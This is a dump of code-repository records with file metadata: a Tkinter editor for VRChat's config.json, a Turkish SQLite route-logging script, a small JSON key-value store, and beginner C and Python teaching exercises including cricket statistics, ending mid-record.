tk.StringVar()\nscreenshot_res_height = tk.StringVar()\nscreenshot_res_width = tk.StringVar()\ncamera_res_height.set(\"1080\")\ncamera_res_width.set(\"1920\")\nscreenshot_res_height.set(\"1080\")\nscreenshot_res_width.set(\"1920\")\ntk.Label(pictures, text=\"VR Camera picture size: \").grid(row=0, column=0)\ntk.Spinbox(pictures, textvariable=camera_res_width, width=4, from_=1280, to=3840).grid(row=0, column=1)\ntk.Spinbox(pictures, textvariable=camera_res_height, width=4, from_=720, to=2160).grid(row=0, column=2)\ntk.Label(pictures, text=\"Desktop screenshot picture size: \").grid(row=1, column=0)\ntk.Spinbox(pictures, textvariable=screenshot_res_width, width=4, from_=1280, to=3840).grid(row=1, column=1)\ntk.Spinbox(pictures, textvariable=screenshot_res_height, width=4, from_=720, to=2160).grid(row=1, column=2)\n\n# Particle limiter\nparticles = tk.LabelFrame(rootwin, text=\"Particle limiter settings\")\nparticles.pack(side=tk.TOP, fill=tk.X)\nparticle_system_limiter = tk.BooleanVar()\ntk.Checkbutton(particles, text=\"Enable particle system limiter.\", variable=particle_system_limiter).grid(row=0)\nps_max_particles = tk.StringVar()\nps_max_systems = tk.StringVar()\nps_max_emission = tk.StringVar()\nps_max_total_emission = tk.StringVar()\nps_mesh_particle_divider = tk.StringVar()\nps_mesh_particle_poly_limit = tk.StringVar()\nps_collision_penalty_high = tk.StringVar()\nps_collision_penalty_med = tk.StringVar()\nps_collision_penalty_low = tk.StringVar()\nps_trails_penalty = tk.StringVar()\ntk.Label(particles, text=\"Max particles per system: \").grid(row=1, column=0)\ntk.Entry(particles, textvariable=ps_max_particles, width=10, validate='all', validatecommand=(verify, '%P')).grid(row=1, column=1)\ntk.Label(particles, text=\"Max particles systems per avatar: \").grid(row=2, column=0)\ntk.Entry(particles, textvariable=ps_max_systems, width=10, validate='all', validatecommand=(verify, '%P')).grid(row=2, column=1)\ntk.Label(particles, text=\"Max speed of particle creation per system: \").grid(row=3, column=0)\ntk.Entry(particles, textvariable=ps_max_emission, width=10, validate='all', validatecommand=(verify, '%P')).grid(row=3, column=1)\ntk.Label(particles, text=\"Max speed of particle creation per avatar: \").grid(row=4, column=0)\ntk.Entry(particles, textvariable=ps_max_total_emission, width=10, validate='all', validatecommand=(verify, '%P')).grid(row=4, column=1)\ntk.Label(particles, text=\"Divide highest mesh particle polygon count: \").grid(row=5, column=0)\ntk.Entry(particles, textvariable=ps_mesh_particle_divider, width=10, validate='all', validatecommand=(verify, '%P')).grid(row=5, column=1)\ntk.Label(particles, text=\"Highest polygon count per mesh particle: \").grid(row=6, column=0)\ntk.Entry(particles, textvariable=ps_mesh_particle_poly_limit, width=10, validate='all', validatecommand=(verify, '%P')).grid(row=6, column=1)\ntk.Label(particles, text=\"Penalty for high accuracy collision: \").grid(row=7, column=0)\ntk.Entry(particles, textvariable=ps_collision_penalty_high, width=10, validate='all', validatecommand=(verify, '%P')).grid(row=7, column=1)\ntk.Label(particles, text=\"Penalty for medium accuracy collision: \").grid(row=8, column=0)\ntk.Entry(particles, textvariable=ps_collision_penalty_med, width=10, validate='all', validatecommand=(verify, '%P')).grid(row=8, column=1)\ntk.Label(particles, text=\"Penalty for low accuracy collision: \").grid(row=9, column=0)\ntk.Entry(particles, textvariable=ps_collision_penalty_med, width=10, validate='all', validatecommand=(verify, '%P')).grid(row=9, column=1)\ntk.Label(particles, text=\"Penalty for trails on particles: \").grid(row=10, column=0)\ntk.Entry(particles, textvariable=ps_trails_penalty, width=10, validate='all', validatecommand=(verify, '%P')).grid(row=10, column=1)\n\nmatchup = {\n \"particle_system_limiter\" : particle_system_limiter,\n \"ps_max_particles\" : ps_max_particles,\n \"ps_max_systems\" : ps_max_systems,\n \"ps_max_emission\" : ps_max_emission,\n \"ps_max_total_emission\" : ps_max_total_emission,\n \"ps_mesh_particle_divider\" : ps_mesh_particle_divider,\n \"ps_mesh_particle_poly_limit\" : ps_mesh_particle_poly_limit,\n \"ps_collision_penalty_high\" : ps_collision_penalty_high,\n \"ps_collision_penalty_med\" : ps_collision_penalty_med,\n \"ps_collision_penalty_low\" : ps_collision_penalty_low,\n \"ps_trails_penalty\" : ps_trails_penalty,\n \"dynamic_bone_max_affected_transform_count\": dynamic_bone_max_affected_transform_count,\n \"dynamic_bone_max_collider_check_count\" : dynamic_bone_max_collider_check_count,\n \"cache_directory\" : cache_directory,\n \"disableRichPresence\" : disableRichPresence,\n \"camera_res_height\" : camera_res_height,\n \"camera_res_width\" : camera_res_width,\n \"screenshot_res_height\" : screenshot_res_height,\n \"screenshot_res_width\" : screenshot_res_width,\n \"cache_expiry_time\" : cache_expiry_time,\n \"cache_size\" : cache_size\n}\n\nif os.path.isfile(file):\n with open(file) as f:\n settings = json.load(f)\n # Slightly different between how we internally handle this and how VRC expects the save to be organized.\n if not \"betas\" in settings.keys():\n settings[\"betas\"] = []\n settings[\"particle_system_limiter\"] = \"particle_system_limiter\" in settings[\"betas\"]\n del settings[\"betas\"]\n for k, v in matchup.items():\n if k in settings.keys():\n if k == \"disableRichPresence\": v.set(not settings[k])\n else: v.set(settings[k])\n\ndef save_settings():\n try:\n global matchup\n settings = {}\n for k, v in matchup.items():\n if k == \"disableRichPresence\": settings[k] = not v.get()\n else: settings[k] = v.get()\n print(k, v.get())\n if isinstance(settings[k], str):\n if settings[k].isdigit():\n settings[k] = int(settings[k])\n elif settings[k] == \"\":\n del settings[k]\n\n # Slightly different between how we internally handle this and how VRC expects the save to be organized.\n if settings[\"particle_system_limiter\"]:\n settings[\"betas\"] = [\"particle_system_limiter\"]\n del settings[\"particle_system_limiter\"]\n\n savestr = json.dumps(settings, indent=2)\n with open(file, 'w') as f:\n f.write(savestr)\n tkinter.messagebox.showinfo(title=\"Save successful.\", message=\"New settings saved to config.json file. VRChat will need to be restarted for these changes to take effect.\")\n except Exception as e:\n with open('error.txt', 'a') as f:\n f.write(str(e))\n f.write(traceback.format_exc())\n tkinter.messagebox.showwarning(title=\"Save failed!\", message=\"Something happened during the file save. Please report this to the GitHub and upload the error.txt file.\")\n\nsave_settings_button.config(command=save_settings)\n\nif not os.path.isdir(os.getenv('USERPROFILE') + \"\\\\AppData\\\\LocalLow\\\\VRChat\\\\VRChat\"):\n tkinter.messagebox.showerror(title=\"Folder not found\", message=\"Could not find folder where VRChat expects the settings file to exist.\")\n raise SystemExit\n\nrootwin.resizable(tk.FALSE, tk.FALSE)\nrootwin.mainloop()" }, { "alpha_fraction": 0.7598684430122375, "alphanum_fraction": 0.7664473652839661, "avg_line_length": 54.3636360168457, "blob_id": "b3ee915ed448116724cc71e0e0681c3794399a51", "content_id": "703e1a93fb86eb6c3a5a5b4529a28919fa89aacc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 608, "license_type": "no_license", "max_line_length": 107, "num_lines": 11, "path": "/README.md", "repo_name": "dj3520/vrcjson", "src_encoding": "UTF-8", "text": "# VRCJSON\n\nUser-friendly graphical interface for VRChat's config.json file. Because apparently someone had to make it!\n\n![Screenshot](https://github.com/dj3520/vrcjson/blob/master/vrcjson.png?raw=true)\n\n - This tool is not a modification to the game, so you are not breaking the Terms of Service by using it.\n - This tool is not made or endorsed by the VRChat team. Asking them for help won't help.\n - Any issues should be reported here.\n - There's a good chance this will need updates as time goes on.\n - If you've added something this tool is not expecting to your config file, pressing save will erase it." } ]
2
emresagir/traffic-route-helper
https://github.com/emresagir/traffic-route-helper
fdd0dae09f28c5d0bcb59aff5de5e8f9d7fd69c4
dc67a9f0eebde027e2b6d109d6125621d85d4bfb
b2d7a24c1491fc2ec0ce26bce6034e7b21571a45
refs/heads/main
2023-03-25T11:51:56.259150
2021-03-25T15:45:59
2021-03-25T15:45:59
351,490,722
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5625954270362854, "alphanum_fraction": 0.5748091340065002, "avg_line_length": 16.714284896850586, "blob_id": "7e6199c81c48e89612612767767cabb7c926f6ff", "content_id": "de52499d0a4706f31b9d59803e1541cedc1cb663", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1354, "license_type": "no_license", "max_line_length": 96, "num_lines": 70, "path": "/sqlite-functions.py", "repo_name": "emresagir/traffic-route-helper", "src_encoding": "UTF-8", "text": "import sqlite3 as lite\r\nimport sys\r\n\r\n#conn = lite.connect(\"main.db\")\r\nc = conn.cursor()\r\n\r\nc.execute(''' SELECT count(name) FROM sqlite_master WHERE type='table' AND name='customers' ''')\r\n\r\nif c.fetchone()[0] == 1:\r\n print('Table exist.')\r\n\r\nelse:\r\n print(\"Tablo yok, oluşturuluyor.\")\r\n c.execute(\"\"\"CREATE TABLE customers (\r\n ad text,\r\n soyad text,\r\n plaka text,\r\n kalkış_yeri text,\r\n varış_yeri text\r\n )\"\"\")\r\n print(\"Tablo oluşturuldu.\")\r\n\r\n\r\n\r\n#c.execute(\"\"\"INSERT INTO customers VALUES(\r\n#'Emre',\r\n#'Sağır',\r\n#'23 dl 434',\r\n#'ankara',\r\n#'bursa'\r\n# )\"\"\")\r\n\r\nc.execute(\"DELETE from customers WHERE rowid = 6\")\r\n\r\n\r\nc.execute(\"SELECT rowid, * FROM customers\") #rowid ile numarasını da alıyorsun satırın.\r\n #* ile de diğer bütün bilgileri.\r\n\r\n\r\nmüşteriList = c.fetchall()\r\nfor müşteri in müşteriList:\r\n print(müşteri)\r\nfor müşteri in müşteriList:\r\n print(müşteri[2])\r\n\r\nconn.commit()\r\nconn.close()\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n#secenekler = \"\"\"\r\n#1- Kayıtlı Rotaları Görüntüle\r\n#2- Yeni Rota Ekle\r\n#3- Çıkış\r\n#\"\"\"\r\n#while True:\r\n# print(secenekler)\r\n# secim = input(\"Hoşgeldiniz, yapmak istediğiniz işlemi seçiniz:\")\r\n# if secim == \"1\":\r\n# pass\r\n# if secim == \"2\":\r\n# pass\r\n# if secim == \"3\":\r\n# break\r\n" }, { "alpha_fraction": 0.5470930337905884, "alphanum_fraction": 0.5534883737564087, "avg_line_length": 22.253520965576172, "blob_id": "30e845a4b2b941cb33751078eec0306e303c4141", "content_id": "2356bb113039a150d5ad57a0144b9f736c964709", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1768, "license_type": "no_license", "max_line_length": 94, "num_lines": 71, "path": "/main.py", "repo_name": "emresagir/traffic-route-helper", "src_encoding": "UTF-8", "text": "import sqlite3 as lite\r\n\r\nconn = lite.connect(\"main.db\")\r\nc = conn.cursor()\r\nc.execute(''' SELECT count(name) FROM sqlite_master WHERE type='table' AND name='rotalar' ''')\r\nif c.fetchone()[0] == 1:\r\n pass\r\nelse:\r\n print(\"Tablo yok, oluşturuluyor.\")\r\n c.execute(\"\"\"CREATE TABLE rotalar (\r\n ad text,\r\n soyad text,\r\n plaka text,\r\n kalkis text,\r\n varis text\r\n )\"\"\")\r\n print(\"Tablo oluşturuldu.\")\r\n\r\n\r\ndef RotaGor():\r\n c.execute(\"SELECT rowid, * FROM rotalar\")\r\n rotalist = c.fetchall()\r\n for rota in rotalist:\r\n print(rota)\r\n\r\ndef rotaEkle(ad, soyad, plaka, kalkis, varis):\r\n conn.execute(\"\"\"\r\n INSERT INTO rotalar VALUES (?,?,?,?,?)\r\n \"\"\"), [(ad, soyad, plaka, kalkis, varis)]\r\n conn.commit()\r\n print(\"Bilgiler kaydedildi.\")\r\n\r\ndef secim():\r\n print(\"\"\"\r\n 1- Kayıtlı Rotaları Görüntüle\r\n 2- Yeni Rota Ekle\r\n 3- Çıkış\r\n \"\"\")\r\n inputsecim = input(\"Hoşgeldiniz, yapmak istediğiniz işlemi seçiniz:\")\r\n if inputsecim == \"1\":\r\n RotaGor()\r\n\r\n if inputsecim == \"2\":\r\n ad = str(input(\"Sürücünün Adını Giriniz:\"))\r\n soyad = str(input(\"Sürücünün Soyadını Giriniz:\"))\r\n plaka = str(input(\"Sürücünün Plakasını Giriniz:\"))\r\n kalkis = str(input(\"Sürücünün Kalkış Yerini Giriniz:\"))\r\n varis = str(input(\"Sürücünün Varış Yerini Giriniz:\"))\r\n rotaEkle(ad, soyad, plaka, kalkis, varis)\r\n\r\n if inputsecim == \"3\":\r\n print(\"ÇIKIŞ YAPILDI.\")\r\n conn.commit()\r\n conn.close()\r\n cikisFlag = 1\r\n return cikisFlag\r\n\r\n\r\ndef main():\r\n while True:\r\n cikisFlag = secim()\r\n if cikisFlag == 1:\r\n break\r\n \r\n\r\n\r\n\r\n \r\n\r\n\r\nmain()" }, { "alpha_fraction": 0.8181818127632141, "alphanum_fraction": 0.8181818127632141, "avg_line_length": 22, "blob_id": "23c22931920df0323553b46adab8f3487e3f74e1", "content_id": "7cfc4916a1eb8c6cfc5a3c44258c48c33fb07c11", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 22, "license_type": "no_license", "max_line_length": 22, "num_lines": 1, "path": "/README.md", "repo_name": "emresagir/traffic-route-helper", "src_encoding": "UTF-8", "text": "# traffic-route-helper" } ]
3
KseniaKuznetsova01/zadanie2
https://github.com/KseniaKuznetsova01/zadanie2
d99654c8a1fe71db7216f358baf53b883108e1e5
323777df10a1b12e0bd41a57876a44cdbab91429
4987c5677265d3f968fa7ef441f378db78ae7fa5
refs/heads/master
2023-02-08T05:51:10.772189
2020-12-22T18:15:00
2020-12-22T18:15:00
323,621,280
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5907859206199646, "alphanum_fraction": 0.5975610017776489, "avg_line_length": 21.393939971923828, "blob_id": "da9a92a1d772a1cb33959eb942a7ace700023715", "content_id": "8115cb8a8baaf048cad09546d142f63489ff1065", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 738, "license_type": "no_license", "max_line_length": 66, "num_lines": 33, "path": "/main.py", "repo_name": "KseniaKuznetsova01/zadanie2", "src_encoding": "UTF-8", "text": "import os\nimport tempfile\nimport json\nimport argparse\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--key', help='key')\nparser.add_argument('--value', help='value')\nargs = parser.parse_args()\n\ndict1 = dict()\nstorage_path = os.path.join(tempfile.gettempdir(), 'storage.data')\n\ndef reading():\n with open(storage_path, 'r') as f:\n first = f.readline()\n if first != '':\n return json.loads(first)\n else:\n return {}\n\ndef key_val(key,val):\n if key in dict1:\n dict1[key] = val\n\n with open(storage_path, 'w') as f:\n f.write(json.dumps(dict1))\n\ndef main():\n if args.key != '' and args.val != 0:\n print(key_val(args.key, args.val))\n else:\n return(None)" } ]
1
SUFIAN485/Online-teaching
https://github.com/SUFIAN485/Online-teaching
e7fef4129b81aa5365aef2d941937b9978df2efb
b8491c7a4e82ad56f815fa174736876e941009d7
a22ea7b4adffef7be9307b1dffce50b23dfe8d25
refs/heads/master
2022-02-16T13:49:40.142135
2019-09-14T07:22:00
2019-09-14T07:22:00
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.40082645416259766, "alphanum_fraction": 0.44214877486228943, "avg_line_length": 14.580645561218262, "blob_id": "aaa9c260ce8741dca41ac518b0d7e200f704a8b6", "content_id": "2f3425f7f45d4dca4a142a64c34153ee20c5604d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 484, "license_type": "no_license", "max_line_length": 40, "num_lines": 31, "path": "/week-7/1.cpp", "repo_name": "SUFIAN485/Online-teaching", "src_encoding": "UTF-8", "text": "/*\nCounting characters\n*/\n\n#include<stdio.h>\n#include<string.h>\n\nint main(){\n char ch[100];\n int count[123],index, i, len;\n\n for(i=65;i<123;i++){\n count[i]=0;\n }\n\n printf(\"Enter a string:\\n\");\n scanf(\"%[^\\n]\",ch);\n len=strlen(ch);\n for(i=0;i<len;i++){\n index=ch[i];\n count[index]++;\n }\n\n for(i=65;i<123;i++){\n if(count[i]>0){\n printf(\"%c=%d\",i, count[i]);\n printf(\"\\n\");\n }\n }\n return 0;\n}\n\n" }, { "alpha_fraction": 0.7986111044883728, "alphanum_fraction": 0.8263888955116272, "avg_line_length": 70, "blob_id": "286c757d2aa9838911c89028de84d846bc256051", "content_id": "7d812bade8ef8f94efba1c04684cccfe3ec68e1a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 144, "license_type": "no_license", "max_line_length": 84, "num_lines": 2, "path": "/README.md", "repo_name": "SUFIAN485/Online-teaching", "src_encoding": "UTF-8", "text": "This repository is to share code snippets for the Bengali programming tutorial site.\nhttps://www.youtube.com/channel/UCQm9dYZVU8j5VD-rHv8Tcxw\n\n\n" }, { "alpha_fraction": 0.5514184236526489, "alphanum_fraction": 0.5656028389930725, "avg_line_length": 13.410256385803223, "blob_id": "da8f0da8dd18c91256a3a9cc33494bc0da161f7d", "content_id": "15b34f4dbadadd3041f89b16304f8aaf7e410116", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 564, "license_type": "no_license", "max_line_length": 40, "num_lines": 39, "path": "/week-9/2.cpp", "repo_name": "SUFIAN485/Online-teaching", "src_encoding": "UTF-8", "text": "\n/*\nprogram for finding \nmax(x,y)*min(y,z)\nwith user-defined functions\n*/\n\n#include<stdio.h>\nint max(int, int);\nint min(int, int);\n\n\nint main(){\n int x,y,z, r1, r2, result;\n printf(\"Enter values for x,y, and z:\");\n scanf(\"%d%d%d\",&x,&y,&z);\n r1=max(x,y);\n r2=min(y,z);\n result=r1*r2;\n /*\n The previous 3 lines can be replaced by\n result = max(x,y)* min(y,z);\n */\n printf(\"The result is: %d\",result);\n\n return 0;\n}\n\nint max(int a, int b){\n if(a>b)\n return a;\n else\n return b;\n}\nint min(int a, int b){\n if(a<b)\n return a;\n\n return b;\n}\n\n" }, { "alpha_fraction": 0.4959677457809448, "alphanum_fraction": 0.5080645084381104, "avg_line_length": 12, "blob_id": "b8b7e98ca1aac90b7dc98af49762dcd1a88f755f", "content_id": "cc3a0427305288370abe4cfc6272a3f2848f6402", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 248, "license_type": "no_license", "max_line_length": 47, "num_lines": 19, "path": "/week-5/1.cpp", "repo_name": "SUFIAN485/Online-teaching", "src_encoding": "UTF-8", "text": "/*\nFind factorial of a number\n*/\n\n#include<stdio.h>\n\nint main()\n{\n int fact=1,i,n;\n printf(\"Enter a number: \");\n scanf(\"%d\",&n);\n for(i=2;i<=n;i++){\n fact*=i;\n }\n\n printf(\"The factorial of %d is %d\",n,fact);\n\treturn 0;\n\n}\n\n" }, { "alpha_fraction": 0.5064935088157654, "alphanum_fraction": 0.6017315983772278, "avg_line_length": 12.529411315917969, "blob_id": "80eab0a922e704f975a47504d6364a8fcaa28288", "content_id": "3aa682407b987c13d00eb7043c3a923b336b31c6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 231, "license_type": "no_license", "max_line_length": 39, "num_lines": 17, "path": "/python/week-4/tmp2.py", "repo_name": "SUFIAN485/Online-teaching", "src_encoding": "UTF-8", "text": "values = [10, 20, 1, 1, 0, 5, 5,6,7,10]\n\nmax_run=20\ntot=float(len(values))\ncount = [0.0]*21\nfor v in values:\n\tcount[v]+=1\nprint count\n\ncdf=[]\n\nprev=0.0\nfor el in count:\n\tpr = (el/tot) + prev \t\n\tcdf.append(pr)\n\tprev = pr\nprint cdf\n\n" }, { "alpha_fraction": 0.4045197665691376, "alphanum_fraction": 0.4406779706478119, "avg_line_length": 17.41666603088379, "blob_id": "626af2cbf4da26f8b42321c137ed0126583d198d", "content_id": "d9b236a34dfe68d806c91df246337e9581cd60ad", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 885, "license_type": "no_license", "max_line_length": 50, "num_lines": 48, "path": "/week-7/3_corrected.cpp", "repo_name": "SUFIAN485/Online-teaching", "src_encoding": "UTF-8", "text": "/*\nFind if the second string is a substring of the\nfirst string.\n*/\n\n#include<stdio.h>\n#include<string.h>\n\nint main(){\n int i,j, decision=1, start, track, len1, len2;\n char ch1[100],ch2[100],c;\n printf(\"Enter the first string:\\n\");\n scanf(\"%[^\\n]\",ch1);\n scanf(\"%c\",&c);\n printf(\"Enter the second string:\\n\");\n scanf(\"%[^\\n]\",ch2);\n\n len1=strlen(ch1);\n len2=strlen(ch2);\n\n for(i=0;i<len1;i++){\n start=i;\n if(len1-start<len2){\n decision=1;\n break;\n }\n track=0;\n for(j=0;j<len2;j++){\n if(ch1[start]!=ch2[j]){\n track=1;\n break;\n }\n start++;\n }\n if(track==0){\n decision=0;\n break;\n }\n }\n\n if(decision==0){\n printf(\"Yes\");\n }\n else{\n printf(\"No\");\n }\n return 0;\n}\n\n" }, { "alpha_fraction": 0.5443425178527832, "alphanum_fraction": 0.5474005937576294, "avg_line_length": 14.523809432983398, "blob_id": "6577e2f1e33916a3221d11afbe8604010252aff6", "content_id": "70f20114eb5d458465304dc66f762d9dca640ec8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 327, "license_type": "no_license", "max_line_length": 51, "num_lines": 21, "path": "/week-5/6.cpp", "repo_name": "SUFIAN485/Online-teaching", "src_encoding": "UTF-8", "text": "/*\nChecking for perfect square number\n*/\n\n#include<stdio.h>\n#include<math.h>\nint main()\n{\n int n,sq;\n printf(\"Enter a number: \");\n scanf(\"%d\",&n);\n sq=sqrt(n);\n if(sq*sq==n){\n printf(\"It's a perfect square number\");\n }\n else{\n printf(\"It's not a perfect square number\");\n }\n\treturn 0;\n\n}\n\n" }, { "alpha_fraction": 0.3128555119037628, "alphanum_fraction": 0.3424345850944519, "avg_line_length": 17.680850982666016, "blob_id": "7b85f4c78e7d382839c470539802db720709f89d", "content_id": "f340463b8b2c402c6db70a213537a7c31ba948c3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 879, "license_type": "no_license", "max_line_length": 42, "num_lines": 47, "path": "/week-7/2.cpp", "repo_name": "SUFIAN485/Online-teaching", "src_encoding": "UTF-8", "text": "/*\nDan Brown code problem 2\n*/\n\n#include<stdio.h>\n#include<string.h>\n\nint main(){\n int found,len, i,j;\n char ch[100];\n char part1[14]=\"ABCDEFGHIJKLM\";\n char part2[14]=\"NOPQRSTUVWXYZ\";\n printf(\"Enter the hidden message:\\n\");\n scanf(\"%[^\\n]\",ch);\n len=strlen(ch);\n\n for(i=0;i<len;i++){\n if(ch[i]==' '){\n printf(\" \");\n }\n else{\n found=0;\n for(j=0;j<13;j++){\n if(ch[i]==part1[j]){\n found=1;\n printf(\"%c\",part2[j]);\n break;\n\n }\n }\n\n if(found==0){\n\n for(j=0;j<13;j++){\n if(ch[i]==part2[j]){\n found=1;\n printf(\"%c\",part1[j]);\n break;\n\n }\n }\n }\n }\n }\n\n return 0;\n}\n\n" }, { "alpha_fraction": 0.6517571806907654, "alphanum_fraction": 0.664536714553833, "avg_line_length": 13.904762268066406, "blob_id": "b314b35a9f242354f8a0693790b9c04f8d0617bf", "content_id": "0f1bb21aa5a868b857f7c7330d7ffee62a331cd1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 313, "license_type": "no_license", "max_line_length": 32, "num_lines": 21, "path": "/python/week-4/readfiles.py", "repo_name": "SUFIAN485/Online-teaching", "src_encoding": "UTF-8", "text": "import os\n\nbase_path=\"data/mushfiq/\"\n\nlist_files=os.listdir(base_path)\ncount=0\nfor file in list_files:\n\tfr=open(base_path+file,\"r\")\n\n\t### ignore header\n\tline=fr.readline()\n\twhile 1:\n\t\tline=fr.readline().strip()\n\t\tif len(line)<3:\n\t\t\tbreak\n\t\tif \"run out\" in line:\n\t\t\tprint line\n\t\t\tcount+=1\n\n\tfr.close()\nprint count\n" }, { "alpha_fraction": 0.4265129566192627, "alphanum_fraction": 0.4524495601654053, "avg_line_length": 14.043478012084961, "blob_id": "2be79173ba07ff346c7d63d165182b02d065dccb", "content_id": "412ea77cf3bd31827384e52b63c761f83844d157", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 347, "license_type": "no_license", "max_line_length": 39, "num_lines": 23, "path": "/week-6/p1.cpp", "repo_name": "SUFIAN485/Online-teaching", "src_encoding": "UTF-8", "text": "/*\nDecimal to binary conversion\n*/\n\n#include<stdio.h>\n\nint main(){\n\n int i, n,remainder,a[100], index=0;\n printf(\"Enter a number: \");\n scanf(\"%d\",&n);\n\n while(n!=0){\n remainder=n%2;\n a[index]=remainder;\n index++;\n n=n/2;\n }\n\n for(i=index-1; i>=0; i--){\n printf(\"%d\",a[i]);\n }\n}\n\n" }, { "alpha_fraction": 0.5385864973068237, "alphanum_fraction": 0.585702657699585, "avg_line_length": 20.120689392089844, "blob_id": "80e27617200ebd3b27c011fbffd09dd88bff7921", "content_id": "753ce398b8350174e8cb67cf2f4e54de2ed7536d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2462, "license_type": "no_license", "max_line_length": 93, "num_lines": 116, "path": "/python/week-4/final_cdf_bd_players.py", "repo_name": "SUFIAN485/Online-teaching", "src_encoding": "UTF-8", "text": "import matplotlib.pyplot as plt\nfig = plt.figure()\nax = fig.add_subplot(111)\n\nlnst=[\"-\", \"--\",\"-.\", \":\", \"-\", \"--\",\"-.\", \":\"]\nmarks=[\"^\", \"d\", \"o\", \"v\", \"p\", \"s\", \"<\", \">\"]\n#marks_size=[15, 17, 10, 15, 17, 10, 12,15]\nmarks_size=[2, 2, 10, 15, 17, 10, 12,15]\nmarker_color=['#0F52BA','#ff7518','#6CA939','#e34234','#756bb1','brown','#c994c7', '#636363']\n\n\ndef collect_runs(records,years):\n max_run=-10\t\n for player in records:\n\n for year in years:\n fr=open(\"data/\"+\n player+\"/years/\"+year+\".txt\",\"r\")\n\n ### ignore header\n fr.readline()\n lines=fr.readlines()\n for line in lines:\n line=line.strip()\n\tparsed=line.split(\"\\t\")\n\trun = parsed[5]\n\n\ttry:\n\n if \"*\" in run:\n\t print run\t\n\t run = run.split(\"*\")[0]\n print run\n\t run = int(run)\n\t records[player][\"runs\"].append(run)\t\n\t if max_run<run:\n\t max_run=run\n\t \t\t\t\t\t\t\n\t\t\t\t\t\t\n\texcept:\n\t print run\n pass\n\t\t\n return records,max_run\n\ndef initialize(players):\n records={}\n for player in players:\n records[player]={}\n records[player][\"runs\"]=[]\n return records\n\n\n\ndef calculate_cdf(records, player):\n\n sm=len(records[player][\"runs\"])\n for run in records[player][\"runs\"]:\n records[player][\"count\"][run]+=1\n \n cdf=[]\n prev=0.0\n\n for i in range(len(records[player][\"count\"])):\n prob=(records[player][\"count\"][i] / sm) + prev\t\n prev=prob\n cdf.append(prob)\n return cdf\n\n\ndef graph(players, records):\n index=0\n for player in players:\n \n dist=calculate_cdf(records, player)\n line=(plt.plot(range(len(dist)),dist))\n mc=marker_color[index]\n stl=lnst[index]\n mk=marks[index]\n\t\t\t\t\t\n \n plt.setp(line,color=mc,linewidth=3,ls=stl)\n index+=1\n for label in ax.get_xticklabels():\n label.set_fontsize(17)\n for label in ax.get_yticklabels():\n label.set_fontsize(17)\n #ax.set_ylim(0, 1.05)\n #ax.set_xlim(0, 70)\n plt.title(\"Mushfiq VS Tamim VS Kohli\",fontsize=20)\n plt.xlabel(\"Runs\",fontsize=18)\n plt.ylabel(\"CDF\",fontsize=18)\n\n\n\n plt.grid(True)\n\n\n plt.legend(players,loc=0,fontsize=20)\n plt.show()\n\n\nif __name__==\"__main__\":\n\n players=[\"mushfiq\", \"tamim\", \"kohli\"]\n \n years=[\"2015\",\"2016\",\"2017\",\"2018\",\"2019\"]\n \n records = initialize(players)\n records,max_run = collect_runs(records,years)\n for player in records:\n\trecords[player][\"count\"]=[0.0]*(max_run+1)\n\n #print sorted(records[\"mushfiq\"][\"runs\"])\n #print len(records[\"tamim\"][\"runs\"])\t\n graph(players, records)\n \n\n\n \t \t\n" }, { "alpha_fraction": 0.5838150382041931, "alphanum_fraction": 0.5953757166862488, "avg_line_length": 9.75, "blob_id": "121ce35b6bc53ee8e0537e7f8e243026263840af", "content_id": "5dbcdf13fc1bf9a5445ca9a6f3a928d9dbff91f0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 173, "license_type": "no_license", "max_line_length": 24, "num_lines": 16, "path": "/python/week-4/calculator/calculation.py", "repo_name": "SUFIAN485/Online-teaching", "src_encoding": "UTF-8", "text": "def add(a,b):\n\treturn a+b\n\ndef subtract(a,b):\n\treturn a-b\n\ndef multiply(a,b):\n\treturn a*b\n\ndef division(a,b):\n\treturn a/b\n\n\nif __name__==\"__main__\":\n\tsm=add(5,2)\n\tprint sm\n\n" }, { "alpha_fraction": 0.6357142925262451, "alphanum_fraction": 0.6452381014823914, "avg_line_length": 15.115385055541992, "blob_id": "285b3019fbdbdf76632033f307738337e7cad357", "content_id": "32af96b6eeaeacc14069ca02e69a6731efa6831d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 420, "license_type": "no_license", "max_line_length": 29, "num_lines": 26, "path": "/python/week-2/test.py", "repo_name": "SUFIAN485/Online-teaching", "src_encoding": "UTF-8", "text": "\ndef avg(ls):\n\tsm=0.0\t\n\tfor i in range(len(ls)):\n\t\tsm+=ls[i]\n\treturn sm/len(ls)\t\n\nfr=open(\"sample.txt\",\"r\")\n\n#### read the header ####\nfr.readline()\n\nlines=fr.readlines()\nplayers={}\nfor line in lines:\n\tline=line.strip()\n\tdata=line.split(\"\\t\")\n\tpl=data[0]\n\trun=float(data[1])\n\tif pl not in players:\n\t\tplayers[pl]=[]\n\n\tplayers[pl].append(run)\t\n\t\nfor player in players:\n\taverage=avg(players[player])\n\tprint player, average\n" }, { "alpha_fraction": 